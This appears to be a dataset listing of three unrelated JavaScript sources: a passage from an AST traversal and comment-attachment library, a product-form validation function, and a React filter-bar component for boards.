Controller.prototype.remove = function () {
    this.notify(REMOVE);
};
// Reset all traversal bookkeeping for a new walk over `root`.
Controller.prototype.__initialize = function (root, visitor) {
    this.visitor = visitor;
    this.root = root;
    this.__worklist = [];
    this.__leavelist = [];
    this.__current = null;
    this.__state = null;

    // Strategy for node types missing from the keys table: 'iteration'
    // walks all own keys; a function computes the keys itself.
    if (visitor.fallback === 'iteration') {
        this.__fallback = objectKeys;
    } else if (typeof visitor.fallback === 'function') {
        this.__fallback = visitor.fallback;
    } else {
        this.__fallback = null;
    }

    // Caller-supplied keys are layered over the defaults prototypally so
    // VisitorKeys itself is never mutated.
    this.__keys = visitor.keys ? extend(objectCreate(VisitorKeys), visitor.keys) : VisitorKeys;
};
// AST nodes are non-null objects carrying a string `type` tag.
function isNode(node) {
    return node != null && typeof node === 'object' && typeof node.type === 'string';
}
// Property-wrapped children occur only in the 'properties' arrays of
// ObjectExpression / ObjectPattern nodes.
function isProperty(nodeType, key) {
    if (key !== 'properties') {
        return false;
    }
    return nodeType === Syntax.ObjectExpression || nodeType === Syntax.ObjectPattern;
}
// Depth-first walk of `root`, firing visitor.enter / visitor.leave for each
// node. Implemented iteratively with an explicit worklist stack.
Controller.prototype.traverse = function traverse(root, visitor) {
    var worklist,
        leavelist,
        element,
        node,
        nodeType,
        ret,
        key,
        current,
        current2,
        candidates,
        candidate,
        sentinel;

    this.__initialize(root, visitor);

    // Unique marker object: popping it means all children of the element on
    // top of leavelist have been visited, so its `leave` callback fires.
    sentinel = {};

    // reference
    worklist = this.__worklist;
    leavelist = this.__leavelist;

    // initialize
    worklist.push(new Element(root, null, null, null));
    leavelist.push(new Element(null, null, null, null));

    while (worklist.length) {
        element = worklist.pop();

        if (element === sentinel) {
            element = leavelist.pop();

            ret = this.__execute(visitor.leave, element);

            if (this.__state === BREAK || ret === BREAK) {
                return;
            }
            continue;
        }

        if (element.node) {

            ret = this.__execute(visitor.enter, element);

            if (this.__state === BREAK || ret === BREAK) {
                return;
            }

            // Schedule the matching `leave` callback for this element.
            worklist.push(sentinel);
            leavelist.push(element);

            if (this.__state === SKIP || ret === SKIP) {
                continue;
            }

            node = element.node;
            nodeType = node.type || element.wrap;
            candidates = this.__keys[nodeType];
            if (!candidates) {
                if (this.__fallback) {
                    candidates = this.__fallback(node);
                } else {
                    throw new Error('Unknown node type ' + nodeType + '.');
                }
            }

            // Children are pushed in reverse key order so they pop in
            // source order.
            current = candidates.length;
            while ((current -= 1) >= 0) {
                key = candidates[current];
                candidate = node[key];
                if (!candidate) {
                    continue;
                }

                if (isArray(candidate)) {
                    current2 = candidate.length;
                    while ((current2 -= 1) >= 0) {
                        if (!candidate[current2]) {
                            continue;
                        }
                        if (isProperty(nodeType, candidates[current])) {
                            element = new Element(candidate[current2], [key, current2], 'Property', null);
                        } else if (isNode(candidate[current2])) {
                            element = new Element(candidate[current2], [key, current2], null, null);
                        } else {
                            continue;
                        }
                        worklist.push(element);
                    }
                } else if (isNode(candidate)) {
                    worklist.push(new Element(candidate, key, null, null));
                }
            }
        }
    }
};
// Like traverse(), but visitor return values rewrite the tree: returning a
// node replaces the current one, REMOVE deletes it, BREAK stops early.
// Returns the (possibly replaced) root.
Controller.prototype.replace = function replace(root, visitor) {
    var worklist,
        leavelist,
        node,
        nodeType,
        target,
        element,
        current,
        current2,
        candidates,
        candidate,
        sentinel,
        outer,
        key;

    // After a node is removed from an array parent, the queued siblings that
    // follow it must have their indices shifted down by one.
    function removeElem(element) {
        var i,
            key,
            nextElem,
            parent;

        if (element.ref.remove()) {
            // When the reference is an element of an array.
            key = element.ref.key;
            parent = element.ref.parent;

            // If removed from array, then decrease following items' keys.
            i = worklist.length;
            while (i--) {
                nextElem = worklist[i];
                if (nextElem.ref && nextElem.ref.parent === parent) {
                    if (nextElem.ref.key < key) {
                        break;
                    }
                    --nextElem.ref.key;
                }
            }
        }
    }

    this.__initialize(root, visitor);

    // Unique marker separating "enter" work from the matching "leave".
    sentinel = {};

    // reference
    worklist = this.__worklist;
    leavelist = this.__leavelist;

    // initialize
    // `outer` wraps the root so even the root itself can be replaced.
    outer = {
        root: root
    };
    element = new Element(root, null, null, new Reference(outer, 'root'));
    worklist.push(element);
    leavelist.push(element);

    while (worklist.length) {
        element = worklist.pop();

        if (element === sentinel) {
            element = leavelist.pop();

            target = this.__execute(visitor.leave, element);

            // node may be replaced with null,
            // so distinguish between undefined and null in this place
            if (target !== undefined && target !== BREAK && target !== SKIP && target !== REMOVE) {
                // replace
                element.ref.replace(target);
            }

            if (this.__state === REMOVE || target === REMOVE) {
                removeElem(element);
            }

            if (this.__state === BREAK || target === BREAK) {
                return outer.root;
            }
            continue;
        }

        target = this.__execute(visitor.enter, element);

        // node may be replaced with null,
        // so distinguish between undefined and null in this place
        if (target !== undefined && target !== BREAK && target !== SKIP && target !== REMOVE) {
            // replace
            element.ref.replace(target);
            element.node = target;
        }

        if (this.__state === REMOVE || target === REMOVE) {
            removeElem(element);
            element.node = null;
        }

        if (this.__state === BREAK || target === BREAK) {
            return outer.root;
        }

        // node may be null
        node = element.node;
        if (!node) {
            continue;
        }

        // Schedule the matching `leave` pass for this element.
        worklist.push(sentinel);
        leavelist.push(element);

        if (this.__state === SKIP || target === SKIP) {
            continue;
        }

        nodeType = node.type || element.wrap;
        candidates = this.__keys[nodeType];
        if (!candidates) {
            if (this.__fallback) {
                candidates = this.__fallback(node);
            } else {
                throw new Error('Unknown node type ' + nodeType + '.');
            }
        }

        // Children are pushed in reverse key order so they pop in source
        // order; each carries a Reference for write-back on replacement.
        current = candidates.length;
        while ((current -= 1) >= 0) {
            key = candidates[current];
            candidate = node[key];
            if (!candidate) {
                continue;
            }

            if (isArray(candidate)) {
                current2 = candidate.length;
                while ((current2 -= 1) >= 0) {
                    if (!candidate[current2]) {
                        continue;
                    }
                    if (isProperty(nodeType, candidates[current])) {
                        element = new Element(candidate[current2], [key, current2], 'Property', new Reference(candidate, current2));
                    } else if (isNode(candidate[current2])) {
                        element = new Element(candidate[current2], [key, current2], null, new Reference(candidate, current2));
                    } else {
                        continue;
                    }
                    worklist.push(element);
                }
            } else if (isNode(candidate)) {
                worklist.push(new Element(candidate, key, null, new Reference(node, key)));
            }
        }
    }

    return outer.root;
};
// Walk `root` with a throwaway Controller instance.
function traverse(root, visitor) {
    return new Controller().traverse(root, visitor);
}
// Like traverse(), but the visitor may replace or remove nodes; delegates
// to a fresh Controller's replace() and returns the (possibly new) root.
function replace(root, visitor) {
    return new Controller().replace(root, visitor);
}
// Compute `comment.extendedRange`: the comment's own range stretched out
// to touch its neighbouring tokens (end of the previous token, start of
// the next one). Mutates and returns `comment`.
function extendCommentRange(comment, tokens) {
    // Index of the first token starting after the comment starts.
    var next = upperBound(tokens, function search(token) {
        return token.range[0] > comment.range[0];
    });

    comment.extendedRange = [comment.range[0], comment.range[1]];

    if (next !== tokens.length) {
        comment.extendedRange[1] = tokens[next].range[0];
    }

    var prev = next - 1;
    if (prev >= 0) {
        comment.extendedRange[0] = tokens[prev].range[1];
    }

    return comment;
}
/**
 * Attaches `providedComments` to nodes of `tree` as `leadingComments` /
 * `trailingComments`, using `tokens` to compute each comment's extended
 * range. The comment objects are deep-copied first, so the caller's array
 * is left untouched; `tree` is mutated in place and returned.
 *
 * @param {Object} tree - root node; must carry `range` information.
 * @param {Array} providedComments - comment objects with `range`.
 * @param {Array} tokens - token stream used to extend comment ranges.
 * @returns {Object} the annotated `tree`.
 * @throws {Error} when `tree.range` is missing.
 */
function attachComments(tree, providedComments, tokens) {
// At first, we should calculate extended comment ranges.
var comments = [], comment, len, i, cursor;
if (!tree.range) {
throw new Error('attachComments needs range information');
}
// tokens array is empty, we attach comments to tree as 'leadingComments'
if (!tokens.length) {
if (providedComments.length) {
for (i = 0, len = providedComments.length; i < len; i += 1) {
comment = deepCopy(providedComments[i]);
// With no tokens, every comment is treated as preceding the program.
comment.extendedRange = [0, tree.range[0]];
comments.push(comment);
}
tree.leadingComments = comments;
}
return tree;
}
// Stretch each comment's range out to its neighbouring tokens so it can
// be matched exactly against node boundaries in the passes below.
for (i = 0, len = providedComments.length; i < len; i += 1) {
comments.push(extendCommentRange(deepCopy(providedComments[i]), tokens));
}
// This is based on John Freeman's implementation.
// Pass 1: a comment whose extended range ends exactly where a node begins
// becomes that node's leading comment; consumed comments are spliced out.
cursor = 0;
traverse(tree, {
enter: function (node) {
var comment;
while (cursor < comments.length) {
comment = comments[cursor];
if (comment.extendedRange[1] > node.range[0]) {
// Comment ends past this node's start; stop scanning for this node.
break;
}
if (comment.extendedRange[1] === node.range[0]) {
if (!node.leadingComments) {
node.leadingComments = [];
}
node.leadingComments.push(comment);
comments.splice(cursor, 1);
} else {
cursor += 1;
}
}
// already out of owned node
if (cursor === comments.length) {
return VisitorOption.Break;
}
if (comments[cursor].extendedRange[0] > node.range[1]) {
return VisitorOption.Skip;
}
}
});
// Pass 2: a comment whose extended range starts exactly where a node ends
// becomes that node's trailing comment.
cursor = 0;
traverse(tree, {
leave: function (node) {
var comment;
while (cursor < comments.length) {
comment = comments[cursor];
if (node.range[1] < comment.extendedRange[0]) {
break;
}
if (node.range[1] === comment.extendedRange[0]) {
if (!node.trailingComments) {
node.trailingComments = [];
}
node.trailingComments.push(comment);
comments.splice(cursor, 1);
} else {
cursor += 1;
}
}
// already out of owned node
if (cursor === comments.length) {
return VisitorOption.Break;
}
if (comments[cursor].extendedRange[0] > node.range[1]) {
return VisitorOption.Skip;
}
}
});
return tree;
}
// Public API of this traversal module, assembled onto the host `exports`
// object that was passed into the enclosing IIFE.
exports.version = require('./package.json').version;
exports.Syntax = Syntax;
exports.traverse = traverse;
exports.replace = replace;
exports.attachComments = attachComments;
exports.VisitorKeys = VisitorKeys;
exports.VisitorOption = VisitorOption;
exports.Controller = Controller;
// Returns a fresh, independent copy of the module environment so callers
// can extend it (e.g. VisitorKeys) without mutating the shared state.
exports.cloneEnvironment = function () { return clone({}); };
return exports;
}(exports));
/* vim: set sw=4 ts=4 et tw=80 : */
|
/**
 * Validates the product form: all fields present, name/description made of
 * words (letters and whitespace), quantity/price strictly numeric.
 * Shows an alert() describing the first failure.
 *
 * @returns {boolean} true when every field is valid, false otherwise.
 */
function validate() {
    var product_name = document.getElementById("product_name").value;
    var quantity = document.getElementById("quantity").value;
    var price = document.getElementById("price").value;
    var description = document.getElementById("description").value;
    // Letters and whitespace: the alert promises "words", so multi-word
    // names/descriptions must be accepted.
    var alpha = /^[A-Za-z\s]+$/;
    // Non-negative number with an optional decimal part, e.g. "3" or "19.99".
    var numeric = /^\d+(\.\d+)?$/;
    if (product_name === "" || quantity === "" || price === "" || description === "") {
        alert("Leave no fields empty");
        return false;
    }
    if (!alpha.test(product_name) || !alpha.test(description)) {
        alert("Only use words and letters for name and description");
        return false;
    }
    // The original check (alpha.test) only rejected all-letter input, so
    // mixed input such as "12abc" slipped through; require a real numeric
    // format instead.
    if (!numeric.test(quantity) || !numeric.test(price)) {
        alert("Only use numbers for quantity and price");
        return false;
    }
    return true;
}
|
import React from 'react';
import { InputSelect } from 'aionic-library';
import Helper from '../../../services/helper';
const BoardsFilters = (props) => {
const { filterItemsByParams, filterItemsByText, resetFilters } = props;
const handleParamsChange = (e) => {
filterItemsByParams({ [e.target.name]: e.target.value });
};
const handleFilterChange = (e) => {
filterItemsByText(e.target.value);
};
const { sortDirections, resultLimits } = Helper.getFilterLists();
const orderByList = [
{ value: '', title: 'Order by' },
{ value: 'created', title: 'Created' },
{ value: 'title', title: 'Title' },
{ value: 'updated', title: 'Updated' }
];
return (
<div className="BoardsFilters">
<form>
<div className="row">
<div className="col-12 col-xl">
<div className="form-group">
<input
type="text"
className="form-control"
placeholder="Filter..."
onChange={handleFilterChange}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="input-group form-group">
<InputSelect
name="orderby"
onChange={handleParamsChange}
optionList={orderByList}
showDefault={false}
/>
<InputSelect
name="orderdir"
classes={['ml-2']}
onChange={handleParamsChange}
optionList={sortDirections}
showDefault={false}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="form-group">
<InputSelect
name="limit"
onChange={handleParamsChange}
optionList={resultLimits}
showDefault={false}
/>
</div>
</div>
<div className="col-12 col-xl-auto">
<div className="form-group">
<button
type="reset"
className="button button-warning btn-block"
onClick={resetFilters}
>
Reset
</button>
</div>
</div>
</div>
</form>
</div>
);
};
export default BoardsFilters;
|
Subsets and Splits